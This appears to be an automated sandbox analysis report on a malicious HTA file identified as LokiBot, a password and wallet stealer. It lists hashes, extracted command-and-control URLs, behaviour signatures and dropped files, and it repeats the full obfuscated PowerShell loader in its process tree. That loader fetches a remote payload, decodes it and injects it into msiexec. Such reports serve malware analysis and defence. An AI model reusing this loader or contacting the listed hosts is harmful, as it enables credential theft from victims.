Overview

overview

10

Static

static

1

Piedvjumap...ta.hta

windows7-x64

10

Piedvjumap...ta.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-10-2024 07:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PiedvjumapieprasjumsVentspilsAugstskolasLV240926hta.hta

  • Size

    7KB

  • MD5

    6478016f557127bcb15e168eb8275c75

  • SHA1

    595e5d9cc7472660ec4e0c182a633014a43c974c

  • SHA256

    acc9d013bc7c54953fd61c5626bcb2378452656ab98a3ef7c9bdeb5b57455933

  • SHA512

    b5a9873d8c1ea36d7aae2e4974f233616221a316deb05ca5dd8b1c423f191c8cd8538f55d13f4d62cc4dab9347bd4b45d93f7dab5acf2d91f7041ceeb578ec46

  • SSDEEP

    96:bpYfMEPTs5q+PgNbvrQZwJrOX32pdF60+oKOnPFIi/fds1R7b8eEj+ErV3/53/yw:yVsiBvrQSNOWp1nh1y7bgq+VRPFih8Gc

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\PiedvjumapieprasjumsVentspilsAugstskolasLV240926hta.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:820
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:972
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2892
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#palletised Venessas Reservefondsaktierne Gnathopodous slutbetingelses Withoutside Undetermined #>;$Diazotize='Padsaw';<#specialinteresser Ditto Chordamesoderm Guardfully #>;$Preestimating247=$host.PrivateData;If ($Preestimating247) {$Torntapper++;}function Extypal87($Whealy){$Uncontinently=$studenterraadet+$Whealy.Length-$Torntapper;for( $Dishcross=3;$Dishcross -lt $Uncontinently;$Dishcross+=4){$Resurceanvendelser+=$Whealy[$Dishcross];}$Resurceanvendelser;}function Protosulphate($Kiluck){ &($Reasiness) ($Kiluck);}$Vejkanters=Extypal87 'F nM ThostozslaiFollstrlFosaBlg/Mun5 Ca.Unc0Min be(,amWAu.i Uln UndCo oUf wOpksFo sagNp.eTWat B.1 Un0Bi.. En0An,;Fra ngWFloiDisnA b6 La4Bet;hjs Te xt,v6Til4En ; le serr TavCoe:Roo1Pre2Kim1L s.ant0Mun)sta GarG ske U,c Rek lyostr/ o2 an0 Ce1 Br0 ik0 ve1Mac0 Bl1O,r s FFi.imosrGraePinfAboos exs i/ Mo1Cya2kan1Kom.K n0,om ';$sixhaend=Extypal87 'Bo.ucousAl,eNetr Ud- HeATorg.iteUniN ivTstu ';$skolebestyrer=Extypal87 'Ph.hPodtMaatAttp iqsGos: Fo/Tge/HavdM crNonispavt,rePla. N,gDaaoXanoTrsgla lRe eKom.spicMelobasmOrc/AnmuBe,cAya?HaneKhaxpsep s,oMacrAl.tPro=UbedUp.oRvewTutn K lD,mo emarugdKar& Moistad n=Gar1b.a7samYJelbaddc bVBul0skowE,iA Kv7swieDatVK,rz Fi6TucLDepE FluOpo9Lo,aKabhAstO nKE.p0HerRBarQBea7spoqresU.ooje eU Co0De 2IncUPix ';$Ufoen128=Extypal87 ' Wa>For ';$Reasiness=Extypal87 ' ubI lE urXBre ';$Rootle='Vaadomraader';$Atrocity='\Ulp.Blo';Protosulphate (Extypal87 'R,s$Nytg R l.isoResbAgiaHa lAmu:BroVRe.aFisg D i BenFugoPresMascfibosenpKloeBo,=Ben$ erestun aavTrs:WagaPosp F pMasdWesaTr tRafaama+ T $O eA sit erLogo Prc.paiReatst yAst ');Protosulphate (Extypal87 'skv$DgggUnal utoKonbAnta akl Hy: stMrapiUnsnPoltE.u2U s0 so4non= la$Leas hukRepoReflFileEleb VaeRecsPiktUroyJosrCyae,enrAmp. scsU ap ol NoiLy t sm(En,$skoUC tfZaro laePilnAl 1Log2Pos8Co )Vac ');Protosulphate (Extypal87 'Pen[sikN pleBedtski. ls keOplrprovs miFlacudfeAlpP s,o A isr,nCirtDatM PaaUbunMeta BugHomeRo,r he]Mtn:s a:Frass.neFo cProuAngrFleiT atAffy slP er enoLantPanoTilcBesoUdll ra Low=,ta mis[PhlNHvieHyptsjl. ugsApoes,ec weust.r IniBlotOveyTahPOver oo FotT moGracFl.oTi,l D TB nyGifpRa e ea] ds: la: FrT ValBl ssu 1 .l2 st ');$skolebestyrer=$Mint204[0];$Konstaterbar=(Extypal87 'Adj$O,ng AnLK nO agbsadaLatLGit:Ab vPloEIntn H EParr FraNoltsceICatONonNor,eF.oN,arsOpk=EjenAnse rkWg,t-reaOT,lb TrJConeNunc Cltspi D,csscayD.tsP gTTouEUd,m.em.HaaNU oEFedTDic. Wiw urE,vebR.hc ,ilCerINoneJoun PetLd, ');Protosulphate ($Konstaterbar);Protosulphate (Extypal87 'Chu$samV P.e OpnsabeHenrsheaE,ttLoviUnpononnf ueDdenGrus ov.CitH FoeMohaBeld ie ,orli sEmb[Ki $An sFeeiDicxKa hForaPunesphn ,edAs ]Ni,=La,$ GaV,lueUtuj Bak sua.idnHa t steNepr Frs nl ');$Unsecuredly=Extypal87 ',iv$ epVscheUd nAp eHenrRedaMuft vaiEspo an P ePsynv,gsE.s.P uDrrto inws.rnLysl.taoForaB ldPr Ft,ri DrlPateNeu(U,b$sp.sLimkPitosullM oeUnabr.peHemsstut Ply sirBe eDelrIso,Bos$Zins A,uU ipPa,eDuarCo cDidhHenarelr Big WieBugrCla)Gul ';$supercharger=$Vaginoscope;Protosulphate (Extypal87 'Zor$AengFrsl ppo spBHana KvlC p:skoTC rr nsaratnIndswheElunlOveeFamMIneEsagN P,t gra sktsl e Un=Ov,(ComtRaiERussDyrTRet- O P HeaWait IshMar sub$ .es.oruApapBr,e nrRPaacstrhBraa,nnRfakgBrrE mR un) I, ');while (!$Transelementate) {Protosulphate (Extypal87 'N n$HangPull BioCrabCala V,lVer:strGTallClia ets Jes.lik.elaGera esl lueInf=No $strtOverallu onesol ') ;Protosulphate $Unsecuredly;Protosulphate (Extypal87 'Alpss.mtT laCa,rHylt,ro-p ts Rel re eleFe,pPro Pro4 u ');Protosulphate (Extypal87 ' ,o$DgngQual Pro ,hbVedasd,l a: OtT NerAriap.en gess ieUldlBryeVgtm IneNeunBunt kyaProt DieGal=W,l(speTHege unsFastTol-An PTalaOctt AnhAc, Unc$T,es I uBlupFuge nnrun c.ufh Frast,rVargO ve atr .k) xy ') ;Protosulphate (Extypal87 'a b$ PogTidlN coPegbNitaKonlAut:BagAHnglsteeHypc Mat sershay ProclemWapa UncImmh M yUnw= st$Wh gF,nlti,oAdrbDisaMeglsea:DodCVokoBaauD fnsk t leRanrMe,aV dnAfvnBeloBunuswinst c HaeIaom koeP rnA,ttCal+,ep+,al% C $ TaMTiliKonnHartPoc2 De0Kli4Pho. aycMyro.mruPhrn shtAf ') ;$skolebestyrer=$Mint204[$Alectryomachy];}$Diegivningernes=334250;$Leucemia=28893;Protosulphate (Extypal87 ' dm$Trag P,l.oroIg bEdgasm lIn :BloBtykaLagj xco,dknFlee ntDaelD,ga UnasiesDa,eA.e A =Ove Co GFe.e.aatUmy-PaaC.dkoT lnNegtFroe rbn F,t.ns dai$legsDisuIvipB,nevarrAfsc anh na nrQ egD leOmgrsoc ');Protosulphate (Extypal87 'sme$Balg BilA tos nbUdsa FllUnp: ,vP .yhE aiMislBeto susForoUp p.enhPali recKr,a KolPen Pro=U a af [VissReey OvsBistBesese m si.OrdCskooLopnDisvArgeKomrFistVot]Hug:Fiv:VaeF ajrLysoNonmD,dBJasaAlasPereHep6Plo4si sI etsalrEmbi ChnProgFli( pa$.kiB Reaseejpjaodrsn hye NitH al,omaMerapres iseV.n)spo ');Protosulphate (Extypal87 'P o$MilgMyol,nroCatbsela WhlYe : npManrPriost,t .aeBlecv,rtTisrVejeTaksOscs E.eAntsvar Inv=Con sca[Retsscey DesBalt Hye Ermhab. MeTseneRehxGadt Al.PraE syn kmcPosoRopd asi .inTomgT e]Brn:B b: skAPy sTilCsbyI DiIkom.KogGTlleM mtC,asPhtt otrForiHe nFing Un(Fuc$C.aPK ah meiM,nlHagoT,ds peo,nep,rehBjei.rnc,eraRholLu ) Na ');Protosulphate (Extypal87 ' nc$D.ngs olHacoci b .oaNonl sy:pikuClon ei CovAfseE sr U,s FlastylIndnLyse pesVexsTri=Upb$ rvp.hir .no lat A,esyscRedtAflrEpie issem s le,risBla. s s .tu Rub susTiltTuar roi,rtninsgNon( Ca$UndDLaniOvee s g iiunhvMo,nRuiiMo,n ungFo eGamrus,n lge ousMon,Til$Kn LP aeQuauunsc kneQuim GliB aaMal)Eup ');Protosulphate $universalness;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4808
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:3496

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    25604a2821749d30ca35877a7669dff9

    SHA1

    49c624275363c7b6768452db6868f8100aa967be

    SHA256

    7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

    SHA512

    206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    54c6e6b6970b9b17d34344b21953a0f6

    SHA1

    a48073c021e9d82fab1b9d89714629fe4a5cf4e1

    SHA256

    d0c6e575e39a2e7d8c384f4e6257c295c2abbd7304e63ee879291e1d29496c9d

    SHA512

    e58664f7a09323f5a10aef532f0de5a23b4c49ff5784b0568366dd4e98d8209c328a3d160bd8b7f90cd70a03d606bed8b90fb80cec4ef4cd8da9323d66d472bc

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    7b729b76807ea4216b633128f80dfded

    SHA1

    0affad81c35b6870bb7a8753be50c5b28551f922

    SHA256

    af667295e8d9d0582c76b18f6f4665bf6f22d0693cb36e55c5d31d6fa99f48cc

    SHA512

    3eddd456de350c50b9f18a259af572167f47afb28f42968ba716e9aa8c0d07d65fa5fcbeda1057f3382532bc04e0675c336a901c6c497ddcae5778d7c2ba8fb3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fzmqbq02.iqh.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Ulp.Blo
    Filesize

    472KB

    MD5

    183f1f76a0c8b3f31dc2cfea13cf9d18

    SHA1

